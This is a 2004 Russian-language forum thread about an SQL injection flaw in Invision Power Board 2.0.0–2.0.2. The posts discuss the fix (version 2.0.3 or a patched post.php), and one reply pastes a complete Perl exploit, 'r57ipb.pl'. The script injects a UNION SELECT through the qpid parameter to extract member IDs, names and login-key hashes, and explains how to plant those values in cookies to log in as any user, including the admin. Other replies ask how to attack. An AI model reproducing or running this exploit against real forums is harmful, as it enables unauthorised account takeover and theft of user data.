Firerain Опубликовано 24 Ноября 2004 Жалоба Поделиться Опубликовано 24 Ноября 2004 SQL инъекция в Invision Power BoardПрограмма: Invision Power Board 2.х Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость в Invision Power Board позволяет удаленному пользователю выполнить произвольные SQL команды на основной базе данных. Уязвимость была обнаружена в результате автоматической проверки сканером безопасности Xspider 7.0. З.Ы. Сам эксплойт приводить не буду. Но он точно есть (и у меня в том числе). Написан на перле. З.З.Ы Лечится якобы апгрейдом до версии 2.0.3. Сам не пробовал. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 d1pro Опубликовано 24 Ноября 2004 Жалоба Поделиться Опубликовано 24 Ноября 2004 И смысл твоего сообщения? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Christoph Schneider Опубликовано 24 Ноября 2004 Жалоба Поделиться Опубликовано 24 Ноября 2004 Ссылку бы дал на описание ! Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 zob1ch Опубликовано 24 Ноября 2004 Жалоба Поделиться Опубликовано 24 Ноября 2004 такая же тема была создана вчера, ниче там обновлять до 2.0.3 не надо, выложен исправленный post.php и эксплойт тоже был Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Mixa Опубликовано 24 Ноября 2004 Жалоба Поделиться Опубликовано 24 Ноября 2004 Дык в версии 2.0.3 это уже исправлено ? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 s0nik Опубликовано 24 Ноября 2004 Жалоба Поделиться Опубликовано 24 Ноября 2004 Mixa да Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 olmer2002 Опубликовано 24 Ноября 2004 Жалоба Поделиться Опубликовано 24 Ноября 2004 2 Firerain а ты уверен,что это касается именно IPB,модет все-таки уяз этот к скуелу больше относится?! ;-))) это по теме:http://www.securitylab.ru/49660.html Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 igrok Опубликовано 25 Ноября 2004 Жалоба Поделиться Опубликовано 25 Ноября 2004 А ГДЕ ЗАПЛУ ТО ВЗЯТЬ , НАРОД ?!?!!? ПОМОГИТЕ =) АТАКУЮТ =)#!/usr/bin/perluse IO::Socket; ## Invision Power Board v2.0.0 - 2.0.2 sql injection exploit## by RusH security team (www.rst.void.ru)## coded by 1dt.w0lf## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## example:#### r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3## ------------------------------------------------------------------------------------------------## [>] SERVER: 127.0.0.1## [>] DIR: /IPB202/## [>] FORUM: 2## [>] TOPIC: 1## [>] SID: 3edb1eaeea640d297ee3b1f78b5679b3## [>] PREFIX:## [>] ID:## ------------------------------------------------------------------------------------------------## ## [~] PREPARE TO CONNECT...## [+] CONNECTED## [~] SENDING QUERY...## [+] DONE!## ## PREFIX: ibf_#### r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3 ibf_## ------------------------------------------------------------------------------------------------## [>] SERVER: 127.0.0.1## [>] DIR: /IPB202/## [>] FORUM: 2## [>] TOPIC: 1## [>] SID: 3edb1eaeea640d297ee3b1f78b5679b3## [>] PREFIX: ibf_## [>] ID:## ------------------------------------------------------------------------------------------------## ## [~] PREPARE TO CONNECT...## [+] CONNECTED## [~] SENDING QUERY...## [+] DONE!## ## --[ REPORT ]------------------------------------------------------------------------------------## MEMBER_ID: [1] NAME: [admin] PASS_HASH: [73dea61281aa9b08ed31b4ae2bb9954e]## ------------------------------------------------------------------------------------------------## Now you need edit cookie and insert new pass_hash and member_id values.## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## Пару слов о возвращаемом эксплоитом результате:## Значение pass_hash это не зашифрованный пароль юзера!!! а одноименное значение из кукиса с## помощью которого можно войти на форум под любым юзером без ввода пароля. ## member_id это также одноименное значение из кукиса.## Поэтому не стоит пытаться расшифровать pass_hash =) Просто зарегистрируйтесь на форуме и измените## pass_hash и member_id в вашем cookie на одно из значений которые выдаст сплоит.## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ if (@ARGV < 5){print "-------------------------------------------------------------------------\r\n";print " Invision Power Board v2.0.0 - 2.0.2 sql injection exploit\r\n";print "-------------------------------------------------------------------------\r\n";print "usage:\r\n";print "r57ipb.pl SERVER /DIR/ FORUM_NUM TOPIC_NUM SID [TABLE_PREFIX] [uSER_ID]\r\n\r\n";print "SERVER - server where IPB installed\r\n";print "/DIR/ - IPB directory or / for no directory\r\n";print "FORUM_NUM - number of existing forum\r\n";print "TOPIC_NUM - number of existing topic\r\n";print "SID - your session id\r\n";print "[TABLE_PREFIX] - table prefix in database\r\n";print "[uSER_ID] - user id for exploiting\r\n\r\n"; print "e.g. r57ipb.pl 127.0.0.1 /IPB/ 2 1 4496b6d35c1bc0662d721c207f81784e ibf_\r\n";print "-------------------------------------------------------------------------\r\n";exit();} if (@ARGV < 6) { $get_table = 1; } $server = $ARGV[0];$dir = $ARGV[1];$fnum = $ARGV[2];$tnum = $ARGV[3];$sid = $ARGV[4];$prefix = $ARGV[5];$id = $ARGV[6]; print "------------------------------------------------------------------------------------------------\r\n";print "[>] SERVER: $server\r\n";print "[>] DIR: $dir\r\n";print "[>] FORUM: $fnum\r\n";print "[>] TOPIC: $tnum\r\n";print "[>] SID: $sid\r\n";print "[>] PREFIX: $prefix\r\n";print "[>] ID: $id\r\n";print "------------------------------------------------------------------------------------------------\r\n\r\n"; $server =~ s/(http:\/\/)//eg; $path = $dir;$path .= "index.php?s=";$path .= $sid;$path .= "&act=Post&CODE=02&f=";$path .= $fnum;$path .= "&t=";$path .= $tnum;if ($get_table == 1) { $path .= "&qpid=r57" }else {$path .= "&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20";$path .= $prefix;$path .= "members";$path .= ($id)?("%20WHERE%20id=$id%20")"%20");$path .= "/*"; }print "[~] PREPARE TO CONNECT...\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; print "[+] CONNECTED\r\n";print "[~] SENDING QUERY...\r\n";print $socket "GET $path HTTP/1.1\r\n";print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n";print $socket "Connection: close\r\n\r\n";print "[+] DONE!\r\n\r\n"; $suc =0; if ($get_table == 1) { while ($answer = <$socket>) { if ($answer =~ /(mySQL query error: )(.*)( FROM )(.*)(posts)/){ print "PREFIX: $4\r\n"; $suc = 1; } } if (!$suc) { print "Exploit failed\r\n"; } exit(); } print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";while ($answer = <$socket>){ if ($answer =~ /^([^:]*)[^:]*)[a-z,0-9]{32})$/) { print "MEMBER_ID: [$1] NAME: [$2] PASS_HASH: [$3]\r\n"; $suc = 1; }}print "------------------------------------------------------------------------------------------------\r\n";if ($suc == 1) { print "Now you need edit cookie and insert new pass_hash and member_id values.\r\n"; exit(); }else { print "Exploit failed\r\n"; } Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 loluk2 Опубликовано 25 Ноября 2004 Жалоба Поделиться Опубликовано 25 Ноября 2004 скажи как атаковать??? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 shuks Опубликовано 25 Ноября 2004 Жалоба Поделиться Опубликовано 25 Ноября 2004 И еще одна уязвимость была... ссылку потерял... там про хеши админа было что-то... постараюсь найтискажи как атаковать???И мне, можно в приват Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 d1pro Опубликовано 25 Ноября 2004 Жалоба Поделиться Опубликовано 25 Ноября 2004 Да, этот эксплоит прибит заплаткой. И вообще, на mySQL 3.x он работать не будет Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 zob1ch Опубликовано 25 Ноября 2004 Жалоба Поделиться Опубликовано 25 Ноября 2004 А ГДЕ ЗАПЛУ ТО ВЗЯТЬ , НАРОД ?!?!!? ПОМОГИТЕ =) АТАКУЮТ =) http://forums.invisionpower.com/index.php?...pe=post&id=4992 Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Firerain Опубликовано 30 Ноября 2004 Автор Жалоба Поделиться Опубликовано 30 Ноября 2004 d1proВыложил, чтоб люди в курсе были. Christoph Schneider Ссылку не стал давать только потому, что не хотел распространения этой гадости. zob1chНе видел этой темы. Приношу свои извинения. olmer2002 Может и к мускулу, но страдает форум. И ешё, тот код, что тут igrok выложил, так вот это не он, хотя работает так же и скорее всего заплатка и тут работать будет! Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Вопрос
Firerain
SQL инъекция в Invision Power Board
Программа: Invision Power Board 2.х
Опасность: Высокая
Наличие эксплоита: Да
Описание: Уязвимость в Invision Power Board позволяет удаленному пользователю выполнить произвольные SQL команды на основной базе данных.
Уязвимость была обнаружена в результате автоматической проверки сканером безопасности Xspider 7.0.
З.Ы. Сам эксплойт приводить не буду. Но он точно есть (и у меня в том числе). Написан на перле.
З.З.Ы Лечится якобы апгрейдом до версии 2.0.3. Сам не пробовал.
Ссылка на комментарий
Поделиться на других сайтах
12 ответов на этот вопрос
Рекомендуемые сообщения
Присоединиться к обсуждению
Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.